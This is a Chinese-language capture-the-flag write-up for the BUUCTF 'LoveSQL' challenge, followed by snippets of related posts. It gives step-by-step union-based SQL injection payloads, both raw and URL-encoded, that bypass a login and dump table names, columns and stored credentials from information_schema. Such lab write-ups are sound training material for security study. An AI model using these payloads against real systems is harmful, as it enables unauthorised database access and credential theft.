[极客大挑战 2019]LoveSQL 1

原创 已于 2023-08-29 00:21:28 修改 · 1.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #sql #mysql

于 2020-09-22 19:55:49 首次发布
本文介绍了一次具体的SQL注入攻击过程,包括确定注入点、探测数据库结构、获取敏感信息等步骤。通过构造特定的payload,成功获取了目标数据库中的表结构及数据。

[极客大挑战 2019]LoveSQL
1
[目标]
Sql注入
[环境]
Buuctf
[工具]
浏览器
[分析]
1.在账号密码框分别试数字或字母,引号都是返回一个结果
在这里插入图片描述

2.试一试万能密码
在这里插入图片描述在这里插入图片描述

3.查询列数
Payload:
username=1’ order by 3#&password=1
Url:1%27%20order%20by%203%23&password=1
在这里插入图片描述

Payload:
username=1’ order by 4#&password=1
Url:
username=1%27%20order%20by%204%23&password=1
在这里插入图片描述

由此可知,总共有三列
4.查询数据库
Payload:username=1’union select 1,database(),version()#&password=1
Url:username=1%27union%20select%201,database(),version()%23&password=1
在这里插入图片描述

5.查询表名
Payload:
username=1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#&password=1
Url:
username=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&password=1
在这里插入图片描述

得到geekuser,l0ve1ysq1两个表
6.查找表中的列
Payload:
username=1’union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()#&password=1
Url:
username=1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%23&password=1
在这里插入图片描述

得到id,username,password,id,username,password这些列
7.查找l0ve1ysq1表中的值
Payload:
username=1’unionselect1,2,group_concat(id,username,password) from l0ve1ysq1#&password=1
Url:
username=1%27union%20select%201,2,group_concat(id,username,password)%20from%20l0ve1ysq1%23&password=1
在这里插入图片描述

打开源码
在这里插入图片描述

得到flag
查询geekuser表中的值
Payload:
username=1’union select 1,2,group_concat(id,username,password) from geekuser#&p
assword=1
Url:
username=1%27union%20select%201,2,group_concat(id,username,password)%20from%20geekuser%23&password=1
在这里插入图片描述

buuctf-[极客挑战 2019]LoveSQL1(小宇特详解)
小宇的web博客
01-15 2031
buuctf-[极客挑战 2019]LoveSQL1(小宇特详解) 1.这里有账号和密码,这里先尝试一下万能密码(在账号那里注入) 1' or 1=1# 密码随便 这里继续进行注入,判断有几列 1' order by 3;# 这里试一试4 1' order by 4;# 这里通过union联合查询 1' union select 1,2,3;# 这里的2,3都是注入点 这里开始按部就班的注入吧 1' union select 1,2,database();# 1' union se
BUUCTF在线评测-练习场-WebCTF习题[极客挑战 2019]LoveSQL1-flag获取、解析
m0_56970656的博客
06-16 1065
打开靶场,页面有点熟悉,上次是简单Sql,在下面链接:BUUCTF在线评测-练习场-WebCTF习题[极客挑战 2019]EasySQL1-flag获取、解析_buuctf easysql 1-优快云博客根据提示,我估计是跟上次比较像,flag可能放在另一个地方了。那么老规矩,直接单引号测试法 可以看到单引号被url编码了,但是没什么关系,并没有做什么过滤观测报错,我们发现是密码部分报错,并且我们输入的123后面多了双引号,前面多个了引号。说明什么?password闭合是双引号,username是单
【CTF_SQL】[极客挑战 2019]LoveSQL 1
十二_的博客
10-22 2396
的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国学生数学建模赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
[极客挑战 2019]LoveSQL 1题解
最新发布
JOY_ZouQY的博客
10-28 321
通常没有 id=1 的用户,前半句空,union 后只剩你构造的数据,页面才能独占回显。这次的题和上次的看上去很相像,所以我们还是先尝试万能账号密码试试SQL注入。因为要让前半句查不到用户,这样后半句 union 的结果才能独占回显。在 MySQL 里默认人人都能读,才能“翻目录”一样翻库、表、列。联合查询,必须让前后两条查询返回的列数一致,否则数据库直接报错。后面把敏感数据放 2 或 3 都能显示,这里我习惯放第 3 列。页面模板里“用户名”位置刚好回显第 2 列,于是你看到。第 3 列对应“密码”位。
[极客挑战 2019]LoveSQL1
qq_51902218的博客
08-09 316
1. 判断是什么类型的注入 1' 发现报错 原因:select name.passwd from users where username=' 1' ' and password=‘ ’; 有语法错误 所以可以判断为字符型注入 2. 利用order by 语句判断字段数 1' order by 3# 1' order by 4 # 得到字段数为3 3.显位:联合查询查看显示位 1' union select 1,2...
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 446
这一题和easysql页面一样
【BUUCTF】[极客挑战 2019]LoveSQL1writeup
GZWZ_的博客
05-04 1221
easysql
buuctf-[极客挑战 2019]LoveSQL
m0_62008601的博客
04-04 2910
一道基础的sql注入
[极客挑战 2019]LoveSQL 1SQL注入)
小谢的博客
06-12 5627
[极客挑战 2019]LoveSQL 1SQL注入)
buu [极客挑战 2019]LoveSQL 1
weixin_45642610的博客
01-10 2625
buu [极客挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看。 进去后是这样: 用户名输入11'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式:1' or 1=1;# 结果: 3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。 可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。 慢慢来,payload: check.php?username=admin'
[极客挑战 2019]LoveSQL 1(详细版)
qq_61861243的博客
09-26 1400
1、首先打开网站页面,一看是一个登录界面,我们想到运用SQL注入,利用密码1’ or 1=1登陆一下,得到admin用户以及他的密码。2、根据之前获得的信息对我找flag没有啥有用的信息,我想到利用SQL语句查询一下刚刚得到的admin所在表的列信息,这里我使用1%27order by 4 %23 与 1%27order by 3 %23 对比判断出表的列数为3。(用%27替代’ , %23替代#)
buuctf web 极客挑战2019 lovesql
07-09
在 BUUCTF Web 极客挑战 2019 的 *LoveSQL* 题目中,这是一道典型的 SQL 注入练习题。题目要求通过注入点获取 flag,并考验了对 SQL 注入的多个阶段的理解与实践能力。 ### 解题思路 首先访问靶机页面后,发现是一个登录界面,提示需要输入用户名和密码。这种情况下通常可以尝试 SQL 注入攻击来绕过验证机制[^4]。 #### 第一步:判断是否存在 SQL 注入漏洞 可以通过简单的 `'` 输入进行测试,观察是否出现数据库报错信息。如果页面返回异常,则说明存在 SQL 注入的可能性。 #### 第二步:使用联合查询 (Union Query) 获取数据 通过构造以下万能密码: ```sql ' or '1'='1 ``` 或类似的 SQL 片段尝试绕过登录限制,从而进入系统并获取初步信息。 接着,进一步使用联合查询来提取数据库中的表名。例如: ```sql ' UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() # ``` 这段语句会将当前数据库的所有表名合并为一个字符串输出,从而帮助确定目标表的位置。 #### 第三步:爆破字段名 找到相关表后,可以继续利用 `information_schema.columns` 来查找该表中的字段名。例如: ```sql ' UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag_table' # ``` 这样便能获取到包含 flag 数据的字段名称。 #### 第四步:读取 flag 数据 最后一步是直接从目标字段中读取 flag 值。例如: ```sql ' UNION SELECT 1,2,flag_value FROM flag_table # ``` 通过这种方式,即可成功提取出 flag 内容。 ### 注意事项 - 在实际操作过程中,需要注意 WAF(Web Application Firewall)可能存在的过滤规则,必要时需对 SQL 语句进行编码或变形处理。 - 可以使用工具如 Burp Suite 或 sqlmap 辅助探测注入点及自动化提取数据。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值